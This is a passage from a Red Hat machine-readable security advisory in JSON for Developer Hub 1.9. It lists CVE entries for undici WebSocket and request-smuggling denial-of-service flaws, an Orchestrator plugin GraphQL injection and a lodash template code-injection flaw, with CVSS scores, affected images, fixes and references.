          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "undici: Undici: HTTP Request Smuggling and Denial of Service due to duplicate Content-Length headers"
    },
    {
      "cve": "CVE-2026-1526",
      "cwe": {
        "id": "CWE-770",
        "name": "Allocation of Resources Without Limits or Throttling"
      },
      "discovery_date": "2026-03-12T21:01:25.538271+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2447142"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in undici. A remote attacker can exploit this vulnerability by sending a specially crafted compressed frame, known as a \"decompression bomb,\" during permessage-deflate decompression. The undici WebSocket client does not properly limit the size of decompressed data, leading to unbounded memory consumption. This can cause the Node.js process to exhaust available memory, resulting in a denial of service (DoS) where the process crashes or becomes unresponsive.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "undici: undici: Denial of Service via unbounded memory consumption during WebSocket permessage-deflate decompression",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-1526"
        },
        {
          "category": "external",
          "summary": "RHBZ#2447142",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447142"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-1526",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1526"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-1526",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1526"
        },
        {
          "category": "external",
          "summary": "https://cna.openjsf.org/security-advisories.html",
          "url": "https://cna.openjsf.org/security-advisories.html"
        },
        {
          "category": "external",
          "summary": "https://datatracker.ietf.org/doc/html/rfc7692",
          "url": "https://datatracker.ietf.org/doc/html/rfc7692"
        },
        {
          "category": "external",
          "summary": "https://github.com/nodejs/undici/security/advisories/GHSA-vrm6-8vpv-qv8q",
          "url": "https://github.com/nodejs/undici/security/advisories/GHSA-vrm6-8vpv-qv8q"
        },
        {
          "category": "external",
          "summary": "https://hackerone.com/reports/3481206",
          "url": "https://hackerone.com/reports/3481206"
        }
      ],
      "release_date": "2026-03-12T20:08:05.950000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "undici: undici: Denial of Service via unbounded memory consumption during WebSocket permessage-deflate decompression"
    },
    {
      "cve": "CVE-2026-1528",
      "cwe": {
        "id": "CWE-248",
        "name": "Uncaught Exception"
      },
      "discovery_date": "2026-03-12T21:01:36.954017+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2447145"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in undici. A remote attacker could exploit this vulnerability by sending a specially crafted WebSocket frame with an extremely large 64-bit length. This causes undici\u0027s ByteParser to overflow its internal calculations, leading to an invalid state and a fatal TypeError. The primary consequence is a Denial of Service (DoS), which terminates the process.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "undici: undici: Denial of Service via crafted WebSocket frame with large length",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-1528"
        },
        {
          "category": "external",
          "summary": "RHBZ#2447145",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447145"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-1528",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1528"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-1528",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1528"
        },
        {
          "category": "external",
          "summary": "https://cna.openjsf.org/security-advisories.html",
          "url": "https://cna.openjsf.org/security-advisories.html"
        },
        {
          "category": "external",
          "summary": "https://github.com/nodejs/undici/security/advisories/GHSA-f269-vfmq-vjvj",
          "url": "https://github.com/nodejs/undici/security/advisories/GHSA-f269-vfmq-vjvj"
        },
        {
          "category": "external",
          "summary": "https://hackerone.com/reports/3537648",
          "url": "https://hackerone.com/reports/3537648"
        }
      ],
      "release_date": "2026-03-12T20:21:57.775000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "undici: undici: Denial of Service via crafted WebSocket frame with large length"
    },
    {
      "cve": "CVE-2026-2229",
      "cwe": {
        "id": "CWE-248",
        "name": "Uncaught Exception"
      },
      "discovery_date": "2026-03-12T21:01:29.187989+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2447143"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the undici WebSocket client. A remote malicious server can exploit this vulnerability by sending a WebSocket frame with an invalid `server_max_window_bits` parameter within the permessage-deflate extension. This improper validation causes the client\u0027s Node.js process to terminate, leading to a denial-of-service (DoS) condition for the client.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "undici: Undici: Denial of Service via invalid WebSocket permessage-deflate extension parameter",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-2229"
        },
        {
          "category": "external",
          "summary": "RHBZ#2447143",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447143"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-2229",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-2229"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-2229",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2229"
        },
        {
          "category": "external",
          "summary": "https://cna.openjsf.org/security-advisories.html",
          "url": "https://cna.openjsf.org/security-advisories.html"
        },
        {
          "category": "external",
          "summary": "https://datatracker.ietf.org/doc/html/rfc7692",
          "url": "https://datatracker.ietf.org/doc/html/rfc7692"
        },
        {
          "category": "external",
          "summary": "https://github.com/nodejs/undici/security/advisories/GHSA-v9p9-hfj2-hcw8",
          "url": "https://github.com/nodejs/undici/security/advisories/GHSA-v9p9-hfj2-hcw8"
        },
        {
          "category": "external",
          "summary": "https://hackerone.com/reports/3487486",
          "url": "https://hackerone.com/reports/3487486"
        },
        {
          "category": "external",
          "summary": "https://nodejs.org/api/zlib.html#class-zlibinflateraw",
          "url": "https://nodejs.org/api/zlib.html#class-zlibinflateraw"
        }
      ],
      "release_date": "2026-03-12T20:27:05.600000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "undici: Undici: Denial of Service via invalid WebSocket permessage-deflate extension parameter"
    },
    {
      "acknowledgments": [
        {
          "names": [
            "Thibault Guittet"
          ]
        }
      ],
      "cve": "CVE-2026-3118",
      "cwe": {
        "id": "CWE-89",
        "name": "Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)"
      },
      "discovery_date": "2026-02-24T12:08:42.955000+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2442273"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A security flaw was identified in the Orchestrator Plugin of Red Hat Developer Hub (Backstage). The issue occurs due to insufficient input validation in GraphQL query handling. An authenticated user can inject specially crafted input into API requests, which disrupts backend query processing. This results in the entire Backstage application crashing and restarting, leading to a platform-wide Denial of Service (DoS). As a result, legitimate users temporarily lose access to the platform.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "rhdh: GraphQL Injection Leading to Platform-Wide Denial of Service (DoS) in RH Developer Hub Orchestrator Plugin",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This MODERATE impact vulnerability in the Orchestrator Plugin of Red Hat Developer Hub (Backstage) allows an authenticated attacker to cause a platform-wide Denial of Service. By injecting specially crafted input into GraphQL API requests, an attacker can disrupt backend query processing, leading to the application crashing and restarting. This issue temporarily prevents legitimate users from accessing the platform.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-3118"
        },
        {
          "category": "external",
          "summary": "RHBZ#2442273",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442273"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-3118",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3118"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-3118",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3118"
        }
      ],
      "release_date": "2026-02-24T00:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        },
        {
          "category": "workaround",
          "details": "To mitigate this issue, restrict network access to the Red Hat Developer Hub instance to trusted users and networks only. This limits the exposure of the vulnerable Orchestrator Plugin to unauthorized access.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "rhdh: GraphQL Injection Leading to Platform-Wide Denial of Service (DoS) in RH Developer Hub Orchestrator Plugin"
    },
    {
      "cve": "CVE-2026-4800",
      "cwe": {
        "id": "CWE-94",
        "name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
      },
      "discovery_date": "2026-03-31T20:01:21.918257+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2453496"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in lodash. The fix for CVE-2021-23337 added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink. Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "lodash: lodash: Arbitrary code execution via untrusted input in template imports",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "In the context of Red Hat Enterprise Linux, the grafana and grafana-pcp packages execute the affected JavaScript entirely client-side within the user\u0027s browser. Consequently, the attack surface is strictly restricted to the local browser environment.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-4800"
        },
        {
          "category": "external",
          "summary": "RHBZ#2453496",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453496"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-4800",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4800"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4800",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4800"
        },
        {
          "category": "external",
          "summary": "https://cna.openjsf.org/security-advisories.html",
          "url": "https://cna.openjsf.org/security-advisories.html"
        },
        {
          "category": "external",
          "summary": "https://github.com/advisories/GHSA-35jh-r3h4-6jhm",
          "url": "https://github.com/advisories/GHSA-35jh-r3h4-6jhm"
        },
        {
          "category": "external",
          "summary": "https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c",
          "url": "https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c"
        }
      ],
      "release_date": "2026-03-31T19:25:55.987000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
